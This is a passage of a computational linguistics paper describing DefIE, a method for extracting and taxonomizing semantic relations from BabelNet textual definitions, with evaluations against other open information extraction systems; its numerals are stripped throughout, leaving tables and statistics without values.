undergoes the following steps: syntactic analysis. each textual defini- tion d is parsed to obtain a dependency graph gd (figure a). parsing is carried out using c&c (clark and curran, ), a log-linear parser based on combinatory categorial grammar (ccg). although our algorithm seamlessly works with any syntactic formalism, ccg rules are especially suited to longer definitions and linguistic phenomena like coordinating conjunctions (steedman, ). semantic analysis. semantic analysis is based on babelfy (moro et al., ), a joint, state- of-the-art approach to entity linking and word sense disambiguation. given a lexicalized semantic net- work as underlying structure, babelfy uses a dense subgraph algorithm to identify high-coherence semantic interpretations of words and multi-word expressions across an input text. we apply babelfy to each definition d, obtaining a sense mapping sd from surface text (words and entity mentions) to word senses and named entities (figure b). as a matter of fact, any disambiguation or entity linking strategy can be used at this stage. however, a knowledge-based unified approach like babelfy is best suited to our setting, where context is limited and exploiting definitional knowledge as much as possible is key to attaining high-coverage results (as we show in section . ). . syntactic-semantic graph construction the information extracted by parsing and dis- ambiguating a given definition d is unified into a syntactic-semantic graph gsemd where concepts and entities identified in d are arranged in a graph struc- ture encoding their syntactic dependencies (figure c). we start from the dependency graph gd, as provided by the syntactic analysis of d in section . . semantic information from the sense mappings sd can be incorporated directly in the vertices of gd by attaching available matches between words and senses to the corresponding vertices. dependency graphs, however, encode dependencies solely on a word basis, while our sense mappings may include multi-word expressions (e.g. pink floyd bn). in order to extract consistent information, subsets of vertices referring to the same concept or entity are merged to a single semantic node, which replaces the subgraph covered in the original dependency structure. consider the example in figure : an entity like pink floyd bn covers two distinct and connected vertices in the dependency graph gd, one for the noun floyd and one for its modifier pink. in the actual semantics of the sentence, as encoded in gsemd (figure c), these two vertices are merged to a single node referring to the entity pink floyd bn (the english rock band), instead of being assigned individual word interpretations. our procedure for building gsemd takes as input a typed dependency graph gd and a sense mapping sd, both extracted from a given definition d. gsemd is first populated with the vertices of gd referring to disambiguated content words, merging those ver- tices covered by the same sense s ∈ sd into a sin- gle node (like pink floyd bn and atom heart mother bn in figure c). then, the remaining ver- tices and edges are added as in gd, discarding non- disambiguated adjuncts and modifiers (like the and fifth in figure ). . relation pattern identification at this stage, all the information in a given defi- nition d has been extracted and encoded in the cor- responding graph gsemd (section . ). we now con- sider those paths connecting entity pairs across the graph and extract the relation pattern r between two entities and/or concepts as the shortest path between the two corresponding vertices in gsemd . this en- ables us to exclude less relevant information (typ- ically carried by adjuncts or modifiers) and reduce data sparsity in the overall extraction process. our algorithm works as follows: given a textual definition d, we consider every pair of identified concepts or entities and compute the corresponding shortest path in gsemd using the floyd-warshall al- gorithm (floyd, ). the only constraint we en- force is that resulting paths must include at least one verb node. this condition filters out meaningless single-node patterns (e.g. two concepts connected algorithm relation extraction procedure extractrelationsfrom(d) : r := ∅ : for each d in d do : gd := dependencyparse(d) : sd := disambiguate(d) : gsemd := buildsemanticgraph(gd,sd) : for each 〈si,sj〉 in sd do : 〈si,rij,sj〉 := shortestpath(si,sj) : r := r ∪{〈si,rij,sj〉} : filterpatterns(r,ρ) return r; with a preposition) and, given the prescriptive nature of d, is unlikely to discard semantically relevant at- tributes compacted in noun phrases. as an example, consider the two sentences “mutter is the third al- bum by german band rammstein” and “atom heart mother is the fifth album by english band pink floyd”. in both cases, two valid shortest-path pat- terns are extracted. the first extracted shortest-path pattern is: x → is → album bn → by → y with ai=mutter bn, aj=rammstein bn for the first sentence and ai=atom heart mother bn, aj=pink floyd bn for the second one. the sec- ond extracted shortest-path pattern is: x → is → y with ai=mutter bn, aj=album bn for the first sentence and ai=atom heart mother bn, aj=album bn for the second one. in fact, our extraction process seamlessly discovers general knowledge (e.g. that mutter bn and atom heart mother bn are instances of the concept album bn) and facts (e.g. that the entities rammstein bn and pink floyd bn have an isalbumby relation with the two recordings). a pseudo-code for the entire extraction algorithm is shown in algorithm : given a set of textual definitions d, a set of relations is generated over extractions r, with each relation r ⊂ r comprising relation instances extracted from d. each d ∈ d is first parsed and disambiguated to produce a syntactic-semantic graph gsemd (sections . - . ); then all the concept pairs 〈si,sj〉 are examined to detect relation instances as shortest paths. finally, we filter out from the resulting set all relations for which the number of extracted instances is below a fixed threshold ρ. the overall algorithm extracts over million relation instances in our experimental setup (section ) with almost , distinct relations. relation type signatures and scoring we further characterize the semantics of our re- lations by computing semantic type signatures for each r ⊂ r, i.e. by attaching a proper semantic class to both its domain and range (the sets of ar- guments occurring on the left and right of the pat- tern). as every element in the domain and range of r is disambiguated, we retrieve the corresponding senses and collect their direct hypernyms. then we select the hypernym covering the largest subset of arguments as the representative semantic class for the domain (or range) of r. we extract hypernyms using babelnet, where taxonomic information cov- ers both general concepts (from the wordnet taxon- omy (fellbaum, )) and named entities (from the wikipedia bitaxonomy (flati et al., )). from the distribution of direct hypernyms over domain and range arguments of r we estimate the quality of r and associate a confidence value with its relation pattern r. intuitively we want to assign higher confidence to relations where the correspond- ing distributions have low entropy. for instance, if both sets have a single hypernym covering all argu- ments, then r arguably captures a well-defined se- mantic relation and should be assigned high confi- dence. for each relation r, we compute: hr = − n∑ i= p(hi) log p(hi) ( ) where hi(i = , ...,n) are all the distinct argument hypernyms over the domain and range of r and probabilities p(hi) are estimated from the propor- tion of arguments covered in such sets. the lower hr, the better semantic types of r are defined. as a matter of fact, however, some valid but over-general relations (e.g. x is a y, x is used for y ) have inher- ently high values of hr. to obtain a balanced score, in all the experiments of section we set ρ = . pattern score entropy x directed by y . . x known for y . . x is election district bn of y . . x is composer bn from y . . x is street bn named after y . . x is village bn founded in in y . . table : examples of relation scores figure : precision against score(r) (a) and hr (b) we therefore consider two additional factors, i.e. the number of extracted instances for r and the length of the associated pattern r, obtaining the following empirical measure: score(r) = |sr| (hr + ) length(r) ( ) with sr being the set of extracted relation instances for r. the + term accounts for cases where hr = . as shown in the examples of table , relations with rather general patterns (such as x known for y ) achieve higher scores compared to very specific ones (like x is village bn founded in in y ) de- spite higher entropy values. we validated our mea- sure on the samples of section . , computing the overall precision for different score thresholds. the monotonic decrease of sample precision in figure a shows that our measure captures the quality of extracted patterns better than hr (figure b). relation taxonomization in the last stage of our approach our set of ex- tracted relations is arranged automatically in a rela- tion taxonomy. the process is carried out by com- paring relations pairwise, looking for hypernymy- hyponymy relationships between the corresponding relation patterns; we then build our taxonomy by connecting with an edge those relation pairs for which such a relationship is found. both the relation figure : hypernym (a) and substring (b) generalizations taxonomization procedures described here examine noun nodes across each relation pattern r, and con- sider for taxonomization only those relations whose patterns are identical except for a single noun node. . hypernym generalization a direct way of identifying hypernym/hyponym noun nodes across relation patterns is to analyze the semantic information attached to them. given two relation patterns ri and rj, differing only in respect of the noun nodes ni and nj, we first look at the as- sociated concepts or entities, ci and cj, and retrieve the corresponding hypernym sets, h(ci) and h(cj). hypernym sets are obtained by iteratively collecting the superclasses of ci and cj from the semantic network of babelnet, up to a fixed height. for instance, given ci = album bn, h(ci) = {work of art bn, creation bn, artifact bn}, and given cj = rammstein bn, h(cj) = {band bn, musical ensemble bn, organization bn}. once we have h(ci) and h(cj), we just check whether cj ∈h(ci) or ci ∈ h(cj) (figure a). according to which is the case, we conclude that rj is a generalization of ri, or that ri is a generalization of rj. . substring generalization the second procedure focuses on the noun (or compound) represented by the node. given two re- lation patterns, ri and rj, we apply the following heuristic: from one of the two nouns, be it ni, any adjunct or modifier is removed, retaining the sole head word n̂i. then, n̂i is compared with nj and, if n̂i = nj, we assume that the relation rj is a gen- eralization of ri (figure b). the simplifying assumption here is that two given relation patterns may be in a hypernymy-hyponymy relationship only when their plain syntactic structure is equivalent (e.g. is n by and is n by, with n and n being two distinct noun nodes). defie nell patty reverb wisenet freebase dbpedia distinct relations distinct relations (disambiguated) - - - - - - average extractions per relation . . . . . . . distinct relation instances distinct concepts/entities involved table : comparative statistics on the relation extraction process experimental setup input. the input corpus used for the relation extraction procedure is the full set of english textual definitions in babelnet . (navigli and ponzetto, ). in fact, any set of textual definitions can be provided as input to defie, ranging from existing dictionaries (like wordnet or wiktionary) to the set of first sentences of wikipedia articles. as it is a merger for various different resources of this kind, babelnet provides a large heterogeneous set com- prising definitions from wordnet, wikipedia, wik- tionary, wikidata and omegawiki. to the best of our knowledge, this set constitutes the largest avail- able corpus of definitional knowledge. we therefore worked on a total of , , textual definitions from the english synsets of babelnet’s knowledge base. we then used the same version of babelnet as the underlying semantic network structure for dis- ambiguating with babelfy. statistics. comparative statistics are shown in table . defie extracts , , relation in- stances, out of which , , feature a fully dis- ambiguated pattern, yielding an average of . dis- ambiguated relation instances extracted from each definition. after the extraction process, our knowl- edge base comprises , distinct semantic re- lations, % of which also have disambiguated content words in their patterns. defie extracts a considerably larger amount of relation instances compared to similar approaches, despite the much smaller amount of text used. for example, we man- aged to harvest over million relation instances more than patty, using a much smaller corpus (sin- babelnet.org according to the wikipedia guidelines, an article should begin with a short declarative sentence, defining what (or who) is the subject and why it is notable. babelfy.org gle sentences as opposed to full wikipedia articles) and generating a number of distinct relations that was six times less than patty’s. as a result, we obtained an average number of extractions that was substantially higher than those of our oie competi- tors. this suggests that defie is able to exploit the nature of textual definitions effectively and general- ize over relation patterns. furthermore, our semantic analysis captured , , distinct arguments (ei- ther concept or named entities), outperforming al- most all open-text systems examined. evaluation. all the evaluations carried out in section were based on manual assessment by two human judges, with an inter-annotator agreement, as measured by cohen’s kappa coefficient, above % in all cases. in these evaluations we compared de- fie with the following oie approaches: • nell (carlson et al., ) with knowledge base beliefs updated to november ; • patty (nakashole et al., ) with free- base types and pattern synsets from the english wikipedia dump of june ; • reverb (fader et al., ), using the set of normalized relation instances from the clueweb dataset; • wisenet (moro and navigli, ; moro and navigli, ) with relational phrases from the english wikipedia dump of december . in addition, we also compared our knowledge base with up-to-date human-contributed resources, namely freebase (bollacker et al., ) and dbpe- dia (lehmann et al., ), both from the dumps of april/may . top top rand rand defie . ± . . ± . . ± . . ± . patty . ± . n/a . ± . n/a table : precision of relation patterns nell patty reverb wisenet freebase dbpedia top . . . . . . rand . . . . . . table : novelty of the extracted information experiments . quality of relations we first assessed the quality and the semantic consistency of our relations using manual evalua- tion. we ranked our relations according to their score (section ) and then created two samples (of size and respectively) of the top scoring relations. in order to evaluate the long tail of less confident relations, we created another two sam- ples of the same size with randomly extracted re- lations. we presented these samples to our human judges, accompanying each relation with a set of argument pairs and the corresponding textual defini- tions from babelnet. for each item in the sample we asked whether it represented a meaningful rela- tion and whether the extracted argument pairs were consistent with this relation and the corresponding definitions. if the answer was positive, the rela- tion was considered as correct. finally we esti- mated the overall precision of the sample as the proportion of correct items. results are reported in table and compared to those obtained by our closest competitor, patty, in the setting of sec- tion . in patty the confidence of a given pattern was estimated from its statistical strength (nakas- hole et al., ). as shown in table , defie achieved a comparable level of accuracy in every sample. an error analysis identified most errors as related to the vagueness of some short and general patterns, e.g. x take y, x make y. others were re- lated to parsing (e.g. in labeling the head word of complex noun phrases) or disambiguation. in ad- dition, we used the same samples to estimate the novelty of the extracted information in compari- son to currently available resources. we examined each correct relation pattern and looked manually for an equivalent relation in the knowledge bases gold standard defie wisenet patty reverb freebase dbpedia table : coverage of semantic relations of both our oie competitors and human-contributed resources. for instance, given the relation x born in y, nell and reverb have the equivalent rela- tions personborninlocation and is born in, while freebase and dbpedia have place of birth and birthplace respectively. we then computed the proportion of ‘new’ relations among those previously labeled as correct by our human judges. results are shown in table for both the top sample and the random sample. the high proportion of relations not appearing in existing re- sources (especially across the random samples) sug- gests that defie is capable of discovering informa- tion not obtainable from available knowledge bases, including very specific relations (x is blizzard in y, x is mayan language spoken by y, x is government- owned corporation in y ), as well as general but un- usual ones (x used by writer of y ). . coverage of relations to assess the coverage of defie we first tested our extracted relations on a public dataset de- scribed in (nakashole et al., ) and consist- ing of semantic relations manually annotated from five wikipedia pages about musicians. fol- lowing the line of previous works (nakashole et al., ; moro and navigli, ), for each an- notation we sought a relation in our knowledge base carrying the same semantics. results are re- ported in table . consistently with the results in table , the proportion of novel information places defie in line with its closest competitors, achieving a coverage of . % with respect to the gold standard. examples of relations not cov- ered by our competitors are hasfatherinlaw and hasdaughterinlaw. furthermore, relations holding between entities and general concepts (e.g. critizedfor, praisedfor, sentencedto), are captured only by defie and reverb (which, however, lacks any argument semantics). we also assessed the coverage of resources based freebase dbpedia nell random % % % table : coverage of manually curated resources patty wisenet random % % table : coverage of individual relation instances hyp. gen. substr. gen. patty (top) patty (rand) precision . ± . . ± . . ± . . ± . # edges density . × − . × − table : precision and coverage of the relation taxonomy on human-defined semantic relations: we extracted three random samples of relations from free- base, dbpedia and nell and looked for seman- tically equivalent relations in our knowledge base. as shown in table , defie reports a coverage be- tween % and % depending on the resource, fail- ing to cover mostly relations that refer to numerical properties (e.g. numberofmembers). finally, we tested the coverage of defie over in- dividual relation instances. we selected a random sample of triples from the two closest com- petitors exploiting textual corpora, i.e. patty and wisenet. for each selected triple 〈ai, r, aj〉, we sought an equivalent relation instance in our knowl- edge base, i.e. one comprising ai and aj and a re- lation pattern expressing the same semantic relation of r. results in table show a coverage greater than % over both samples. given the dramatic re- duction of corpus size and the high precision of the items extracted, these figures demonstrate that def- initional knowledge is extremely valuable for rela- tion extraction approaches. this might suggest that, even in large-scale oie-based resources, a substan- tial amount of knowledge is likely to come from a rather smaller subset of definitional sentences within the source corpus. . quality of relation taxonomization we evaluated our relation taxonomy by manually assessing the accuracy of our taxonomization heuris- tics. then we compared our results against patty, the only system among our closest competitors that generates a taxonomy of relations. the setting for this evaluation was the same of that of section . . however, as we lacked a confidence measure in this case, we just extracted a random sample of hy- pernym edges for each generalization procedure. we presented these samples to our human judges and, for each hypernym edge, we asked whether the cor- responding pair of relations represented a correct generalization. we then estimated the overall preci- sion as the proportion of edges regarded as correct. results are reported in table , along with patty’s results in the setting of section ; as patty’s edges are ranked by confidence, we consid- ered both its top confident subsumptions and a random sample of the same size. as shown in table , defie outperforms patty in terms of precision, and generates more than twice the number of edges overall. harpy (grycner and weikum, ) en- riches patty’s taxonomy with , hypernym edges, but its alignment algorithm, in the setting of section , also includes transitive edges and still yields a sparser taxonomy compared to ours, with a graph density of . × − . generalization errors in our taxonomy are mostly related to disambigua- tion errors or flaws in the wikipedia bitaxonomy (e.g. the concept titular church bn marked as hyponym of cardinal bn). . quality of entity linking and disambiguation we evaluated the disambiguation stage of defie (section . ) by comparing babelfy against other state-of-the-art entity linking systems. in order to compare different disambiguation outputs we se- lected a random sample of , glosses from the input corpus of textual definitions (section ) and ran the relation extraction algorithm (sections . - . ) using a different competitor in the disambigua- tion step each time. we eventually used the map- pings in babelnet to express each output using a common dictionary and sense inventory. the coverage obtained by each competitor was as- sessed by looking at the number of distinct relations extracted in the process, the total number of relation instances extracted, the number of distinct concepts or entities involved, and the average number of se- mantic nodes within the relation patterns. for each competitor, we also assessed the precision obtained by evaluating the quality and semantic consistency of the relation patterns, in the same manner as in # relations # triples # entities average sem. nodes babelfy . tagme . . wat . dbpedia spotlight . wikipedia miner . table : coverage for different disambiguation systems relations relation instances babelfy . % . % tagme . . % . % wat . % . % dbpedia spotlight . % . % wikipedia miner . % . % table : precision for different disambiguation systems section . , both at the level of semantic relations (on the top relation patterns) and at the level of individual relation instances (on a randomly ex- tracted sample of triples). results are shown in tables and for babelfy and the following sys- tems: • tagme . (ferragina and scaiella, ), which links text fragments to wikipedia based on measures like sense commonness and keyphraseness (mihalcea and csomai, ); • wat (piccinno and ferragina, ), an en- tity annotator that improves over tagme and features a re-designed spotting, disambiguation and pruning pipeline; • dbpedia spotlight (mendes et al., ), which annotates text documents with dbpedia uris using scores such as prominence, topical relevance and contextual ambiguity; • wikipedia miner (milne and witten, ), which combines parallelized processing of wikipedia dumps, relatedness measures and annotation features. as shown in table , babelfy outperforms all its competitors in terms of coverage and, due to its unified word sense disambiguation and entity link- ing approach, extracts semantically richer patterns tagme.di.unipi.it spotlight.dbpedia.org wikipediadataminer.cms.waikato.ac.nz # definitions proportion (%) wikipedia . wikidata . wordnet . wiktionary . omegawiki . table : composition of the input corpus by source # relations # relation instances avg. extractions wikipedia . wikidata . wordnet . wiktionary . omegawiki . table : impact of each source on the extraction step with . semantic nodes on the average per sen- tence. this reflects on the quality of semantic rela- tions, reported in table , with an overall increase of precision both in terms of relations and in terms of individual instances; even though wat shows slightly higher precision over relations, its consid- erably lower coverage yields semantically poor pat- terns ( . semantic nodes on the average) and im- pacts on the overall quality of relations, where some ambiguity is necessarily retained. as an example, the pattern x is station in y, extracted from wat’s disambiguation output, covers both railway stations and radio broadcasts. babelfy produces, instead, two distinct relation patterns for each sense, tag- ging station as railway station bn for the for- mer and station bn for the latter. . impact of definition sources we carried out an empirical analysis over the input corpus in our experimental setup, studying the impact of each source of textual definitions in isolation. in fact, as explained in section , babelnet’s textual definitions come from various resources: wordnet, wikipedia, wikidata, wik- tionary and omegawiki. table shows the com- position of the input corpus with respect to each of these definition sources. the distribution is rather skewed, with the vast majority of definitions coming from wikipedia (almost % of the input corpus). we ran the relation extraction algorithm (sections . - . ) on each subset of the input corpus. as in previous experiments, we report the number of re- lation instances extracted, the number of distinct re- # wikipages # sentences # extractions precision all . % top . % table : extraction results over non-definitional text # relation instances # relations # edges patty (definitions) patty (wikipedia) our system table : performance of patty on definitional data lations, and the average number of extractions for each relation. results, as shown in table , are consistent with the composition of the input cor- pus in table : by relying solely on wikipedia’s first sentences, the extraction algorithm discovered % of all the distinct relations identified across the whole input corpus, and % of the total num- ber of extracted instances. wikidata provides more than million extractions ( % of the total) but def- initions are rather short and most of them ( . %) generate only is-a relation instances. the remain- ing sources (wordnet, wiktionary, omegawiki) ac- count for less than % of the extractions. . impact of the approach vs. impact of the data defie’s relation extraction algorithm is explic- itly designed to target textual definitions. hence, the result it achieves is due to the mutual contribution of two key features: an oie approach and the use of definitional data. in order to decouple these two factors and study their respective im- pacts, we carried out two experiments: first we applied defie to a sample of non-definitional text; then we applied our closest competitor, patty, on the same definition corpus described in section . extraction from non-definitional text. we selected a random sample of wikipedia pages from the english wikipedia dump of october . we processed each sentence as in sections . - . and extracted instances of those relations produced by defie in the original definitional setting (section ); we then automatically filtered out those instances where the arguments’ hypernyms did not agree with the semantic types of the relation. we evaluated manually the quality of extractions on a sample of source label target enzyme bn catalyzes reaction bn of chemical bn album bn recorded by rock group bn officier bn commanded brigade bn of army unit bn bridge bn crosses over river bn academic journal bn covers research bn in science bn organization bn has headquarters bn in city bn table : examples of augmented semantic edges items (as in section . ) for both the full set of extracted instances and for the subset of extractions from the top scoring relations. results are reported in table : in both cases, precision figures show that extraction quality drops consistently in comparison to section . , suggesting that our extraction approach by itself is less accurate when moving to more complex sentences (with, e.g., subordinate clauses or coreferences). patty on textual definitions. since no open- source implementation of patty is available, we implemented a version of the algorithm which uses babelfy for named entity disambiguation. we then ran it on our corpus of babelnet definitions and compared the results against those originally ob- tained by patty (on the entire wikipedia corpus) and those obtained by defie. figures are reported in table in terms of number of extracted relation instances, distinct relations and hypernym edges in the relation taxonomy. results show that the dra- matic reduction of corpus size affects the support sets of patty’s relations, worsening both coverage and generalization capability. . preliminary study: resource enrichment to further investigate the potential of our ap- proach, we explored the application of defie to the enrichment of existing resources. we focused on babelnet as a case study. in babelnet’s seman- tic network, nodes representing concepts and en- tities are only connected via lexicograhic relation- ships from wordnet (hypernymy, meronymy, etc.) or unlabeled edges derived from wikipedia hyper- links. our extraction algorithm has the potential to provide useful information to both augment unla- beled edges with labels and explicit semantic con- tent, and create additional connections based on se- mantic relations. examples are shown in table . # concept pairs # unlabeled # labeled type signatures relation instances table : concept pairs and associated edges in babelnet we carried out a preliminary analysis over all dis- ambiguated relations with at least extracted in- stances. for each relation pattern r, we first exam- ined the concept pairs associated with its type signa- tures and looked in babelnet for an unlabeled edge connecting the pair. then we examined the whole set of extracted relation instances in r and looked in babelnet for an unlabeled edge connecting the argu- ments ai and aj. results in table show that only . % of the concept pairs representing relation type signatures are connected in babelnet, and most of these connections are unlabeled. by the same token, more than million distinct argument pairs ( . %) do not share any edge in the semantic network and, among those that do, less than % have a labeled relationship. these proportions suggest that our re- lations provide a potential enrichment of the under- lying knowledge base in terms of both connectivity and labeling of existing edges. in babelnet, our case study, cross-resource mappings might also propa- gate this information across other knowledge bases and rephrase semantic relations in terms of, e.g., au- tomatically generated wikipedia hyperlinks. related work from the earliest days, oie systems had to cope with the dimension and heterogeneity of huge un- structured sources of text. the first systems em- ployed statistical techniques and relied heavily on information redundancy. then, as soon as semi- structured resources came into play (hovy et al., ), researchers started developing learning sys- tems based on self-supervision (wu and weld, ) and distant supervision (mintz et al., ; krause et al., ). crucial issues in distant supervision, like noisy training data, have been addressed in var- ious ways: probabilistic graphical models (riedel et al., ; hoffmann et al., ), sophisticated multi-instance learning algorithms (surdeanu et al., ), matrix factorization techniques (riedel et al., ), labeled data infusion (pershina et al., ) or crowd-based human computing (kondreddi et al., ). a different strategy consists of moving from open text extraction to more constrained settings. for instance, the knowledge vault (dong et al., ) combines web-scale extraction with prior knowledge from existing knowledge bases; biper- pedia (gupta et al., ) relies on schema-level attributes from the query stream in order to create an ontology of class-attribute pairs; renoun (yahya et al., ) in turn exploits biperpedia to extract facts expressed as noun phrases. defie focuses, in- stead, on smaller and denser corpora of prescriptive knowledge. although early works, such as mindnet (richardson et al., ), had already highlighted the potential of textual definitions for extracting re- liable semantic information, no oie approach to the best of our knowledge has exploited definitional data to extract and disambiguate a large knowledge base of semantic relations. the direction of most papers (especially in the recent oie literature) seems rather the opposite, namely, to target web-scale corpora. in contrast, we manage to extract a large amount of high-quality information by combining an oie un- supervised approach with definitional data. a deeper linguistic analysis constitutes the fo- cus of many oie approaches. syntactic dependen- cies are used to construct general relation patterns (nakashole et al., ), or to improve the qual- ity of surface pattern realizations (moro and nav- igli, ). phenomena like synonymy and poly- semy have been addressed with kernel-based simi- larity measures and soft clustering techniques (min et al., ; moro and navigli, ), or exploiting the semantic types of relation arguments (nakashole et al., ; moro and navigli, ). an appro- priate modeling of semantic types (e.g. selectional preferences) constitutes a line of research by itself, rooted in earlier works like (resnik, ) and fo- cused on either class-based (clark and weir, ), or similarity-based (erk, ), approaches. how- ever, these methods are used to model the seman- tics of verbs rather than arbitrary patterns. more re- cently some strategies based on topic modeling have been proposed, either to infer latent relation seman- tic types from oie relations (ritter et al., ), or to directly learn an ontological structure from a start- ing set of relation instances (movshovitz-attias and cohen, ). however, the knowledge generated is often hard to interpret and integrate with existing knowledge bases without human intervention (rit- ter et al., ). in this respect, the semantic predi- cates proposed by flati and navigli ( ) seem to be more promising. a novelty in our approach is that issues like poly- semy and synonymy are explicitly addressed with a unified entity linking and disambiguation algorithm. by incorporating explicit semantic content in our re- lation patterns, not only do we make relations less ambiguous, but we also abstract away from specific lexicalizations of the content words and merge to- gether many patterns conveying the same semantics. rather than using plain dependencies we also inject explicit semantic content into the dependency graph to generate a unified syntactic-semantic representa- tion. previous works (moro et al., ) used simi- lar semantic graph representations to produce filter- ing rules for relation extraction, but they required a starting set of relation patterns and did not exploit syntactic information. a joint approach of syntactic- semantic analysis of text was used in works such as (lao et al., ), but they addressed a substan- tially different task (inference for knowledge base completion) and assumed a radically different set- ting, with a predefined starting set of semantic re- lations from a given knowledge base. as we en- force an oie approach, we do not have such require- ments and directly process the input text via parsing and disambiguation. this enables defie to gener- ate relations already integrated with resources like wordnet and wikipedia, without additional align- ment steps (grycner and weikum, ), or seman- tic type propagations (lin et al., ). as shown in section . , explicit semantic content within re- lation patterns underpins a rich and high-quality re- lation taxonomy, whereas generalization in (nakas- hole et al., ) is limited to support set inclusion and leads to sparser and less accurate results. conclusion and future work we presented defie, an approach to oie that, thanks to a novel unified syntactic-semantic analy- sis of text, harvests instances of semantic relations from a corpus of textual definitions. defie ex- tracts knowledge on a large scale, reducing data sparsity and disambiguating both arguments and re- lation patterns at the same time. unlike previous semantically-enhanced approaches, mostly relying on the semantics of argument types, defie is able to semantify relation phrases as well, by providing explicit links to the underlying knowledge base. we leveraged an input corpus of . million definitions and extracted over million relation instances, with more than , distinct relations and almost . million concepts and entities involved. from these relations we automatically constructed a high- quality relation taxonomy by exploiting the explicit semantic content of the relation patterns. in the resulting knowledge base concepts and entities are linked to existing resources, such as wordnet and wikipedia, via the babelnet semantic network. we evaluated defie in terms of precision, coverage, novelty of information in comparison to existing re- sources and quality of disambiguation, and we com- pared our relation taxonomy against state-of-the-art systems obtaining highly competitive results. a key feature of our approach is its deep syntactic-semantic analysis targeted to textual def- initions. in contrast to our competitors, where syn- tactic constraints are necessary in order to keep pre- cision high when dealing with noisy data, defie shows comparable (or greater) performances by ex- ploiting a dense, noise-free definitional setting. de- fie generates a large knowledge base, in line with collaboratively-built resources and state-of-the-art oie systems, but uses a much smaller amount of in- put data: our corpus of definitions comprises less than million tokens overall, while other oie sys- tems exploit massive corpora like wikipedia (typi- cally more than . billion tokens), clueweb (more than billion tokens), or the web itself. fur- thermore, our semantic analysis based on babelfy enables the discovery of semantic connections be- tween both general concepts and named entities, with the potential to enrich existing structured and semi-structured resources, as we showed in a pre- liminary study on babelnet (cf. section . ). as the next step, we plan to apply defie to open text and integrate it with definition extraction and automatic gloss finding algorithms (navigli and ve- lardi, ; dalvi et al., ). also, by further ex- ploiting the underlying knowledge base, inference and learning techniques (lao et al., ; wang et al., ) can be applied to complement our model, generating new triples or correcting wrong ones. fi- nally, another future perspective is to leverage the increasingly large variety of multilingual resources, like babelnet, and move towards the modeling of language-independent relations. acknowledgments the authors gratefully acknowledge the support of the erc starting grant multijedi no. . this research was also partially supported by google through a faculty research award granted in july . references kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collab- oratively created graph database for structuring hu- man knowledge. in proceedings of sigmod, pages – . andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r. hruschka jr., and tom m. mitchell. . toward an architecture for never- ending language learning. in proceedings of aaai, pages – . stephen clark and james r. curran. . wide- coverage efficient statistical parsing with ccg and log-linear models. computational linguistics, ( ): – . stephen clark and david weir. . class-based prob- ability estimation using a semantic hierarchy. com- putational linguistics, ( ): – . bhavana dalvi, einat minkov, partha p. talukdar, and william w. cohen. . automatic gloss finding for a knowledge base using ontological constraints. in proceedings of wsdm, pages – . claudio delli bovi, luis espinosa anke, and roberto navigli. . knowledge base unification via sense embeddings and disambiguation. in proceedings of emnlp, pages – . xin dong, evgeniy gabrilovich, geremy heitz, wilko horn, ni lao, kevin murphy, thomas strohmann, shaohua sun, and wei zhang. . knowledge vault: a web-scale approach to probabilistic knowl- edge fusion. in proceedings of kdd, pages – . arnab dutta, christian meilicke, and simone paolo ponzetto. . a probabilistic approach for inte- grating heterogeneous knowledge sources. in pro- ceedings of eswc, pages – . katrin erk. . a simple, similarity-based model for selectional preferences. in proceedings of acl, page – . oren etzioni, michele banko, stephen soderland, and daniel s. weld. . open information extraction from the web. commun. acm, ( ): – . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information extraction. in proceedings of emnlp, pages – . christiane fellbaum. . wordnet: an electronic lexical database. bradford books. paolo ferragina and ugo scaiella. . fast and accu- rate annotation of short texts with wikipedia pages. ieee software, ( ): – . tiziano flati and roberto navigli. . spred: large- scale harvesting of semantic predicates. in proceed- ings of acl, pages – . tiziano flati, daniele vannella, tommaso pasini, and roberto navigli. . two is bigger (and better) than one: the wikipedia bitaxonomy project. in pro- ceedings of acl, pages – . robert w. floyd. . algorithm : shortest path. communications of the acm, ( ): – . adam grycner and gerhard weikum. . harpy: hypernyms and alignment of relational paraphrases. in proceedings of coling, pages – . rahul gupta, alon halevy, xuezhi wang, steven eui- jong whang, and fei wu. . biperpedia: an ontology for search applications. in proceedings of vldb, pages – . raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s. weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of naacl hlt, pages – . eduard hovy, roberto navigli, and simone paolo ponzetto. . collaboratively built semi-structured content and artificial intelligence: the story so far. artificial intelligence, : – . sarath kumar kondreddi, peter triantafillou, and ger- hard weikum. . combining information extrac- tion and human computing for crowdsourced knowl- edge acquisition. in proceedings of icde, pages – . sebastian krause, hong li, hans uszkoreit, and feiyu xu. . large-scale learning of relation- extraction rules with distant supervision from the web. in proceedings of iswc. ni lao, amarnag subramanya, fernando pereira, and william w. cohen. . reading the web with learned syntactic-semantic inference rules. in pro- ceedings of emnlp-conll, pages – . jens lehmann, robert isele, max jakob, anja jentzsch, dimitris kontokostas, pablo n. mendes, sebastian hellmann, mohamed morsey, patrick van kleef, sören auer, and christian bizer. . dbpedia - a large-scale, multilingual knowledge base extracted from wikipedia. semantic web journal, pages – . thomas lin, mausam, and oren etzioni. . no noun phrase left behind: detecting and typing un- linkable entities. in proceedings of emnlp-conll, pages – . farzaneh mahdisoltani, joanna biega, and fabian m. suchanek. . yago : a knowledge base from multilingual wikipedias. in cidr. pablo n. mendes, max jakob, andrés garcía-silva, and christian bizer. . dbpedia spotlight: shedding light on the web of documents. in proceedings of i-semantics, pages – . rada mihalcea and andras csomai. . wikify!: linking documents to encyclopedic knowledge. in proceedings of cikm, pages – . david milne and ian h. witten. . an open-source toolkit for mining wikipedia. artificial intelligence, : – . bonan min, shuming shi, ralph grishman, and chin- yew lin. . ensemble semantics for large-scale unsupervised relation extraction. in proceedings of emnlp-conll, pages – . mike mintz, steven bills, rion snow, and dan juraf- sky. . distant supervision for relation extrac- tion without labeled data. in proceedings of acl- ijcnlp, pages – . tom m. mitchell. . reading the web: a break- through goal for ai. ai magazine. andrea moro and roberto navigli. . wisenet: building a wikipedia-based semantic network with ontologized relations. in proceedings of cikm, pages – . andrea moro and roberto navigli. . integrating syntactic and semantic analysis into the open infor- mation extraction paradigm. in proceedings of ijcai, pages – . andrea moro, hong li, sebastian krause, feiyu xu, roberto navigli, and hans uszkoreit. . semantic rule filtering for web-scale relation extraction. in proceedings of iswc, pages – . andrea moro, alessandro raganato, and roberto nav- igli. . entity linking meets word sense 